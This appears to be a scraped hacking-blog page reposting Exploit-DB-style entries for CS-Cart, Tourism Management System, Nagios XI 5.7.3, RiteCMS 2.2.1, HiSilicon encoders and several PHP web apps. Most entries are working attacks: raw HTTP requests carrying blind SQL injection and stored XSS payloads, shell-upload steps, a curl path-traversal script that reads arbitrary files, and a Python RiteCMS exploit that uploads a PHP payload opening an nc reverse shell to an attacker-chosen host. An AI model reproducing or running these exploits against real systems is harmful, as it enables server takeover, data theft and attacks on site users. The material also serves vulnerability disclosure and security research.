    # Exploit Title: CS-Cart authenticated RCE # Date: 2020-09-22 # Exploit Author: 0xmmnbassel # Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html # Tested at: ver. 1.3.3 # Vulnerability Type: authenticated RCE get PHP shells from http://pentestmonkey.net/tools/web-shells/php-reverse-shell edit IP && PORT Upload to file manager change the extension from .php to .phtml visit http://[victim]/skins/shell.phtml --> Profit. ...!
  17. HireHackking

    Tourism Management System 1.0 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload #Date: 2020-10-19 #Exploit Author: Ankita Pal & Saurav Shukla #Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/ #Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204 #Version: V1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the affected URL http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php Step 2: Open Tour Package -> Create Malicious Request::: POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713 Content-Length: 1101 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id Upgrade-Insecure-Requests: 1 -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagename" Pack1 -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagetype" Family -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagelocation" Manali -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packageprice" 21 -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagefeatures" Free -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagedetails" Details -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packageimage"; filename="file1.php" Content-Type: application/octet-stream <?php phpinfo(); ?> -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="submit" -----------------------------63824304340061635682865592713--
  18. HireHackking

    Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection # Date: 10-18-2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.3 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A blind SQL injection vulnerability exists in the "Manage Users" functionality of the Core Config Manager of Nagios XI. # Vulnerable Parameter : id # POC POST /nagiosxi/includes/components/ccm/index.php?type=user&page=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=user&id=2&page=1&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1 Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i Content-Type: application/x-www-form-urlencoded Content-Length: 338 username=test&alias=test&password=password&confirm=password&active=1&id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)&cmd=admin&mode=modify&hidId=2&hidName=&hidServiceDescription=&hostAddress=127.0.0.1&exactType=user&type=user&genericType=user&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1&token=991611d98c6c8ea7d32c54522b346448
  19. HireHackking

    Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting # Date: 10-18-2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.3 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Contact Templates" functionality of the Core Config Manager of Nagios XI. # Vulnerable Parameter : tfName # POC # Exploit Details : The following request will create a contact template with an XSS payload as the contact template name. Click on "Relationships" for the malicious template to trigger the payload. POST /nagiosxi/includes/components/ccm/index.php?type=contacttemplate&page=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 642 Origin: http://TARGET Connection: close Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=contacttemplate&id=7&page=1&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1 Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i Upgrade-Insecure-Requests: 1 tfName=<img+src=a+onerror=alert(1)>&tfFriendly=&tfEmail=&tfPager=&Active=1&tfAddress1=&tfAddress2=&tfAddress3=&tfAddress4=&tfAddress5=&tfAddress6=&radHostNotifEnabled=2&selHostPeriod=0&radStatusInfos=2&radNoStatusInfos=2&radServiceNotifEnabled=2&selServicePeriod=0&radCanSubCmds=2&radContactgroup=2&radServicecommand=2&radHostcommand=2&txtVariablename=&txtVariablevalue=&cmd=submit&mode=modify&hidId=7&hidName=test&hidServiceDescription=&hostAddress=127.0.0.1&exactType=contacttemplate&type=contacttemplate&genericType=contacttemplate&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1&token=3b8273eea1213ac4d2c1f3da1b0c370d
  20. HireHackking

    Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection # Date: 10-18-2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.3 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A blind SQL injection vulnerability exists in the "Add a Trap Definition" functionality of the SNMP Trap Interface of Nagios XI. # Vulnerable Parameter : id # POC GET /nagiosxi/includes/components/nxti/index.php?event=test&oid=123&category=test&severity=test&desc=%3C%3E&format=&id=&SNMPTW%5Bhost%5D=&SNMPTW%5Bservice%5D=&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=&exec%5B%5D=&raw-data=&mode=save&new=0&tab=3&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a) HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://TARGET/nagiosxi/includes/components/nxti/index.php Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
  21. HireHackking

    Online Discussion Forum Site 1.0 - XSS in Messaging System

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Discussion Forum Site 1.0 - XSS in Messaging System # Google Dork: N/A # Date: 2020-10-17 # Exploit Author: j5oh # Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html # Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site # Version: 1.0 (REQUIRED) # Tested on: Windows 10 / Wamp Server # CVE : N/A The messaging subsystem in the Online Discussion Forum is vulnerable to XSS in the message body. This will execute when viewing the messages page: http://localhost/Online%20Discussion%20Forum%20Site/messages.php. XSS can be done through the messaging interface, go to http://localhos/Online%20Discussion%20Forum%20Site/messages.php, select 'Send New Message', search for the user to send the message to, click the 'Send Message' button next to the user, and add the javascript in the message body. Alternatively, if you know the user id you can just send the message directly thought the tt parameter of http://localhost/Online%20Discussion%20Forum%20Site/messageH.php. # PoC: curl -d 'uto=1&tt=<script> alert("XSS"); </script>' -b "PHPSESSID=798bkt3dkvoczjp7arnco3jf0c" http://localhost/Online%20Discussion%20Forum%20Site/messageH.php
  22. HireHackking

    Online Student's Management System 1.0 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Student's Management System 1.0 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020/10/18 # Exploit Author: Akıner Kısa # Vendor Homepage: https://www.sourcecodester.com/php/14490/online-students-management-system-php-full-source-code-2020.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip # Version: 1.0 # Tested on: XAMPP # CVE : N/A Proof of Concept: 1 - Go to http://localhost/studentrecord/ url, click "click here to sign in" text and login with the 070101:070101 information. 2 - Then go to http: //localhost/studentrecord/my-profile.php and upload your shell file from the upload new photo section and click the update button. 3 - Finally, open your shell in http://localhost/studentrecord/staffphoto/shell.php
  23. HireHackking

    RiteCMS 2.2.1 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution # Date: 2020-07-03 # Exploit Author: H0j3n # Vendor Homepage: http://ritecms.com/ # Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download # Version: 2.2.1 # Tested on: Linux # Reference: https://www.exploit-db.com/exploits/48636 # !/usr/bin/python # coding=utf-8 import requests,sys,base64,os from colorama import Fore, Back, Style from requests_toolbelt.multipart.encoder import MultipartEncoder requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) # Variable CONTENT = '''<form action="index.php" method="post">''' # Header def header(): top = cyan(''' \t _____ _ _ _____ __ __ _____ \t| __ \(_) | / ____| \/ |/ ____| \t| |__) |_| |_ ___| | | \ / | (___ ___ ___ ___ \t| _ /| | __/ _ \ | | |\/| |\___ \ _ __ |_ | |_ | < / \t| | \ \| | || __/ |____| | | |____) | | |/ / / __/_ / __/_ / / \t|_| \_\_|\__\___|\_____|_| |_|_____/ |___/ /____(_)____(_)_/ ''') return top def info(): top = cyan(''' [+] IP : {0} [+] USERNAME : {1} [+] PASSWORD : {2} '''.format(IP,USER,PASS)) return top # Request Function # Color Function def cyan(STRING): return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET def red(STRING): return Style.BRIGHT+Fore.RED+STRING+Fore.RESET # Main if __name__ == "__main__": print header() print "\t--------------------------------------------------------------" print "\t| RiteCMS v2.2.1 - Authenticated Remote Code Execution |" print "\t--------------------------------------------------------------" print "\t| Reference : https://www.exploit-db.com/exploits/48636 |" print "\t| By : H0j3n |" print "\t--------------------------------------------------------------" if len(sys.argv) == 1: print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) print cyan("\n[-] Please Put IP & Credentials") sys.exit(-1) if len(sys.argv) == 2: print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) print cyan("\n[-] Please Put Credentials") sys.exit(-1) if len(sys.argv) > 3: print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) print cyan("\n[-] Only 2 arguments needed please see the usage!") sys.exit(-1) IP = sys.argv[1] USER,PASS = sys.argv[2].split(":") print info() URL='{0}/cms/index.php'.format(IP) URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media' HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"} LOG_INFO = {"username" : USER, "userpw" : PASS} try: with requests.Session() as SESSION: SESSION.get(URL) SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False) except: print red("[-] Check the URL!") sys.exit(-1) if CONTENT in str(SESSION.get(URL_UPLOAD).text): print red("[-] Cannot Login!") sys.exit(-1) else: print cyan("[+] Credentials Working!") LHOST = str(raw_input("Enter LHOST : ")) LPORT = str(raw_input("Enter LPORT : ")) FILENAME = str(raw_input("Enter FileName (include.php) : ")) PAYLOAD = "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f'); ?>".format(LHOST,LPORT) FORM_DATA = { 'mode': (None,'filemanager'), 'file': (FILENAME, PAYLOAD), 'directory': (None, 'media'), 'file_name': (None, ''), 'upload_mode': (None, '1'), 'resize_xy': (None, 'x'), 'resize': (None, '640'), 'compression': (None, '80'), 'thumbnail_resize_xy': (None, 'x'), 'thumbnail_resize': (None, '150'), 'thumbnail_compression': (None, '70'), 'upload_file_submit': (None, 'OK - Upload file') } HEADER_UPLOAD = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': URL_UPLOAD } response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD) if FILENAME in response.text: print cyan("\n[+] File uploaded and can be found!") else: print red("[-] File cannot be found or use different file name!") sys.exit(-1) URL_GET = IP + '/media/{0}'.format(FILENAME) OPTIONS = str(raw_input("Exploit Now (y/n)?")) print cyan("\nW0rk1ng!!! Enjoy :)") SESSION.get(URL_GET)
  24. HireHackking

    HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: https://www.szuray.com/ # Software Link: N/A # Version: up to 1.97 # Tested on: Linux # CVE: CVE-2020-24219 # Vendors: URayTech # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 2 ] then echo "Usage: $0 <server>[:<port>] <filepath>" echo "Example: $0 1.2.3.4:8086 /box/box.ini" exit 1 fi curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \ || echo "ERROR: curl returned $?"
  25. HireHackking

    Online Job Portal 1.0 - Cross Site Scripting (Stored)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored) # Google Dork: N/A # Date: 2020/10/17 # Exploit Author: Akıner Kısa # Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip # Version: 1.0 # Tested on: XAMPP # CVE : N/A Proof of Concept: 1 - Open URL http://localhost/jobportal/Employer/ManageJob.php 2 - Fill in the blanks with this payload: "><script>alert (1)</script> 3 - And click submit button.